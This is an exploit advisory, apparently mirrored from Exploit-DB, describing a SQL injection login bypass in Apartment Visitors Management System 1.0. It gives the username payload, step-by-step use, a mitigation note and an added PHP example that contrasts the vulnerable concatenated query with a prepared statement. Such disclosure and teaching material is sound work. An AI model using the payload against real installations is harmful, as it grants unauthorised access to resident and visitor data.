Vendor: Apartment Visitors Management System
By: Kshitiz Raj(manitorpotterk)
CVSS: 8.8 HIGH
Authentication Bypass
CWE: 287
Product Name: Apartment Visitors Management System
Affected Version From: V1.0
Affected Version To: V1.0
Patch Exists: No
Related CWE: N/A
CPE: a:phpgurukul:apartment_visitors_management_system:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10, Kali Linux
2020

Apartment Visitors Management System 1.0 – Authentication Bypass

Apartment Visitors Management System 1.0 is vulnerable to authentication bypass. An attacker can bypass authentication by entering ' or '1'='1'# as the username and any value as the password.

Mitigation:

Ensure that authentication is properly implemented and that user input is properly sanitized.
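
One way to apply this mitigation, shown as an added example that is not the application's own code: the concatenated query pattern that this kind of bypass relies on, next to a login check that uses a prepared statement and a password hash. The `admin` table, its columns and the function names are hypothetical, and in-memory SQLite stands in for MySQL so the script runs offline.

```php
<?php
// Added example. Schema and function names are hypothetical, not taken from
// the application. SQLite (in memory) stands in for MySQL; the PDO
// prepared-statement calls are the same for both drivers.

// Vulnerable pattern: user input is pasted into the SQL text, so a quote in
// the username ends the string literal and the rest is parsed as SQL.
function build_concatenated_sql(string $user, string $pass): string
{
    return "SELECT id FROM admin WHERE username='$user' AND password='$pass'";
}

// Hardened pattern: the username travels as a bound parameter (always data),
// and the password is checked against a stored hash outside the query.
function login(PDO $db, string $user, string $pass): ?int
{
    $stmt = $db->prepare('SELECT id, password_hash FROM admin WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($pass, $row['password_hash'])) {
        return null; // unknown user or wrong password
    }
    return (int) $row['id'];
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password_hash TEXT)');
$ins = $db->prepare('INSERT INTO admin (username, password_hash) VALUES (?, ?)');
$ins->execute(['admin', password_hash('constructed-sample-pw', PASSWORD_DEFAULT)]);

$payload = "' or '1'='1'#"; // the username given in the write-up

// Print the statement the concatenating code would send. In MySQL, '#' starts
// a comment, so the password condition is never evaluated.
echo build_concatenated_sql($payload, 'anything'), PHP_EOL;

// With the bound parameter the same input is only compared as a literal name.
var_dump(login($db, $payload, 'anything'));
var_dump(login($db, 'admin', 'constructed-sample-pw'));
```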

Exploit-DB raw data:

# Exploit Title: Apartment Visitors Management System 1.0 - Authentication Bypass
# Date: 2020-12-24 
# Exploit Author:  Kshitiz Raj(manitorpotterk)
# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
# Version: V1.0 
# Tested on: Windows 10/Kali Linux

Step 1 - Go to URL http://localhost/avms/index.php

Step 2 - Enter Username: ' or '1'='1'#

Step 3 - Enter Password: anything